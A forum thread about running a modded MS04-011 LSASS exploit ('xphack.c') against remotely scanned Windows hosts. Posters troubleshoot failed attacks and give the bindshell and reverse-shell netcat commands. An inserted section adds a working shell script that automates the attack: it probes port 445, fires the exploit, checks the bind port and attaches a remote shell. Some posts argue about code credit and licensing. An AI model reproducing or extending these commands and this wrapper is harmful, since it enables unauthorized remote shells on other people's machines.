Full Version: Xphack.c
Found this on SecurityFocus; haven't seen this particular brew of the MS04-011 exploit talked about here yet. The guy that modded it up seems to have done a good job of automating the process more.
http://downloads.securityfocus.com/vulnera...ploits/xphack.c
I'm trying it right now, I will review it.
EDIT: Well, IMO it works as well as the HOD lsass.exe exploit, but it binds the shell locally without a reverse. Well, it's nice to have it in both versions, thanks for sharing! // Compiled exploit
heh, sounds nice
Nice, nice, love this bug.
Thanks to Microsoft and the coders of this nice exploit! *g* I'm gonna have fun with this... tWiStEr
Works well:
Hi, I've used it a lot... but here you can see what my result is. Can you help me with what this means??
I got no shell; it says so, but netcat doesn't make it??? Do you know why?
I think the exploit failed and the port wasn't opened. Try nc -vv ***.***.***.*** 666. Then you get some verbose information.
Hi, thanks for your answer...
Hmm, the IPs I scanned all had the port open.... Are there several ports or just this one port to exploit the machines?
Well, the source code looks good; it isn't hard to put in a connect back,
but it uses the same vuln as the lsass exploit from me or HOD. Anyway, it's a good exploit. Greetz, agathos
Isn't it something like this?
First start nc -vv -L -p <PORT>, then execute xp localhost <PORT>?
No, it's a bindshell.
You do xphack ip bindport, then nc ip port.
What does this mean:
I always get this message... am I doing something wrong?
The target port 445 is blocked by a FW or router.
Thanks guys, but it's detected!
So which ports can I try? 666, 555, 333? All of 'em?
Yup, search for servers that have those three ports wide open..... good luck m8!!
*oink*
Yeah, you can use any port for the bindshell.... Just the scan port is 445! That's it! (Sorry for my English -> I am from Germany ^^)
Why does this exploit work 1 time in 20? Is it due to the security fix?
Yeah dude, thanks for the source.
THX a lot! This helped me to understand why sometimes it's possible to reconnect to a target and sometimes it's not.
Good exploit! THX a lot! I tried to exploit an XP host (unpatched); it's always a success.
I don't know about you, but this code upsets me and points out why you should NEVER share any source code.
This is mostly stolen code from another exploit, with the author not giving any credit to whom he stole the code from.
Thanks for sharing
After I got a remote shell on the victim machine, how do I transfer and execute via nc?
I know how to do it if both the victim and I have nc, but this exploit did not upload nc to the victim. Any help would be appreciated.
I can see you have never spent hours and hours on something that someone took and called their own. For me, what I see is this: the original author gave us their time and hard work in making the source code for the exploit. I feel we owe it to them to give them credit if you use most of their code.
What the hell? No password?!?!!? The end of the stupid fad?
heh, nice work mate!
What about shellcode? Look at how many reverse shell and bind shell codes are the same. Should they, and the basic concept behind how they work, be kept locked away for nobody to see? Let's lock up the Linux kernel while we're at it too; too many smart people that understand code are finding weak buffers in it... I can generally see where you're coming from, but you're just wrong. Every exploit that comes out is based on exploiting one weakness, each its own. But for every advisory, look how many exploits are released. It's because code can be improvised to crack something each in the way the author intends. </rant> But yeah, the author should have at least acknowledged the other releases.
Oh yeah, and on the whole 'passwording files' topic... I wanted to post an actual topic about this in the forum, but I don't feel like it.
People, if you're going to post information on the internet, don't make people have to msg you and kiss your ass for a password. It's not going to keep it private. I'm going to devote a website to me unrarring people's passworded "private" programs they made and posted onto a website accessible to any idiot w/ an email address. And a high majority of these programs they are posting are a bunch of OCXs and DLLs... all glued together to some low-level programming code and compiled on some kid's unregistered copy of Visual Basic they downloaded off Kazaa. </rant> However, I must say, there are people that post unique and creative custom code that is actually of use in this world. To those people that release here, this Bud's for you.
Yeah... this is nice source indeed, but I can't get any shells. Are all people patched or am I doing something wrong?
Thanks for sharing!!
Very nice sploit ;-)
This exploit uses the same bind shellcode as the HouseOfDaBus version.
Hmm... I'd really need some help here.
Can anyone tell me why I can't connect to the remote PC?
C:\FTP Files\Programje\XPhack>xp ***.**.**.*** 666
-----XpHack 1.0 beta-----
-----ExPlOiT CoDeD By: JoCaNoR-----
Connecting...Good
Getting a shell...OoOoOps shell!!
C:\FTP Files\Programje\XPhack>nc -vv ***.**.**.*** 666
[***.**.**.***] 666 (doom): TIMEDOUT
sent 0, rcvd 0: NOTSOCK
C:\FTP Files\Programje\XPhack>
Did I miss anything? Wrong port? Wrong command? Thx
If you had read the first post on this thread, you would have seen this: "found this on security focus, havent seen this particular brew of this ms04011 talken about here yet. the guy that modded it up seemed to do a good job of automating the process more" The keyword here is Modded; he took no credit for the original work. As for credit, just look at the source and you can see where it came from. The open source world is built on people modding other people's work, so get used to it! This is how people learn.
Very good tool, BIG THX 4 it
Very well said.
I guess not... I've tested it like that and it worked fine...
1st command: xp 10.0.0.0 666
Connecting...Good
Getting a shell...OoOoOps shell!!
2nd command: nc 10.0.0.0 666
C:\windows\system32\
Simple as that =) Try some other vulnerable boxes.
Yes, the open source world is built on modding other people's work so we can all learn from it. But it is not built on people not giving any credit to the original author. I feel it is very simple to give one line that says "code based on so-and-so's code". I am also shocked how many people feel there is nothing wrong with using someone's work without giving them any credit. GNU license agreement:
/* This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
 */
http://www.gnu.org/licenses/licenses.html
Take your -vv out of your nc line.
lol! I think it would be better if you played cards or Playmobil!
Is it possible that my nc isn't working? 'Cause I don't get any shells.
I have the same problem as HotNoob.
I don't think the problem is your netcat. It should be the way you're performing the commands (read all the posts in this topic), or maybe you're trying ranges without vulnerable servers. Very handy for making an autohacker.
It's the same if I don't type -vv. -vv just tells me where the error is, if there is one. And I scanned the IPs before I started exploiting them. Are the PCs maybe patched?
This exploit is easy to use.
First cmd.exe: nc.exe -l -p 66. Second cmd.exe: xp.exe 0 vic ip 66 your ip .. .. and you'll get a shell in the first cmd.exe. If it isn't working, the vic is patched or filtering 445. Also try several times; sometimes it doesn't work, I don't know why.
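An added example, not the thread's or xphack.c's own code, that scripts the bindshell procedure posters describe above (xp <ip> <port>, then nc <ip> <port>) for a POSIX shell rather than cmd.exe, and bakes in the two checks people in this thread end up doing by hand: whether 445 is reachable at all (the "blocked by FW or router" case) and whether the bind port actually opened (the "exploit failed and the port wasn't opened" case). The xp binary name and argument order, the netcat status strings it matches on, and the IP addresses are assumptions, not taken from the page.

```shell
#!/bin/sh
# Added example, not code from the thread or from xphack.c: a wrapper around the
# bindshell procedure the posters describe ("xp <ip> <port>, then nc <ip> <port>")
# that adds the two checks behind most of the "no shell" reports above:
# is 445 reachable at all, and did the bind port actually open.
# Assumptions (not stated on the page): 'xp' is the compiled exploit in PATH and
# takes "<ip> <port>"; nc is a Hobbit- or OpenBSD-style netcat whose -vv status
# line contains "open"/"succeeded", "refused" or "TIMEDOUT"/"timed out";
# IPs below are placeholders.

# Map one netcat -vv status line onto a port state. Prints one word.
classify_nc() {
    case "$1" in
        *open*|*succeeded*)        echo open ;;      # something answered on the port
        *refused*)                 echo closed ;;    # host up, nothing listening
        *TIMEDOUT*|*"timed out"*)  echo filtered ;;  # no answer: fw/router or host down
        *)                         echo unknown ;;
    esac
}

# Turn the state of 445 and of the bind port into the diagnosis the thread gives
# by hand: a filtered 445 means the exploit never talked to LSASS; an open 445 with
# a closed bind port means the exploit ran but no shell was spawned (patched, or the
# "1 time in 20" failure people report); an open bind port means connect now.
diagnose() {
    smb="$1"; sh_state="$2"
    if [ "$smb" != open ]; then
        echo "445 is $smb: blocked by a firewall/router or host down, exploit cannot reach LSASS"
    elif [ "$sh_state" = open ]; then
        echo "bind port open: connect with nc"
    else
        echo "445 open but bind port is $sh_state: exploit failed (patched?) or shell died, retry"
    fi
}

# Probe one TCP port with a connect scan and classify the last nc status line.
probe() {
    line=$(nc -vv -z -w 3 "$1" "$2" 2>&1 | tail -n 1)
    classify_nc "$line"
}

# The actual attempt: check 445, run the exploit, check the bind port, then attach.
try_bindshell() {
    ip="$1"; port="${2:-666}"
    smb=$(probe "$ip" 445)
    if [ "$smb" != open ]; then
        diagnose "$smb" unknown
        return 1
    fi
    xp "$ip" "$port"            # assumed exploit: binds cmd.exe on $port on success
    sleep 2                     # give the shellcode a moment to start listening
    sh_state=$(probe "$ip" "$port")
    diagnose open "$sh_state"
    if [ "$sh_state" = open ]; then
        exec nc "$ip" "$port"   # attach to the bound shell, as the thread does by hand
    fi
    return 1
}

# Usage: ./xpwrap.sh 10.0.0.5 666   (runs only when given a target on the command line)
if [ "$#" -ge 1 ]; then
    try_bindshell "$@"
fi
```

The useful part for the questions in this thread is classify_nc plus diagnose: a TIMEDOUT on the bind port after "OoOoOps shell!!" is not a netcat problem but a shell that was never bound, and a TIMEDOUT on 445 means the exploit never reached the target in the first place.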
Please, can someone tell me what bug it uses?
^^^^^ ?
It's people like this that keep this board from its true potential. ms04011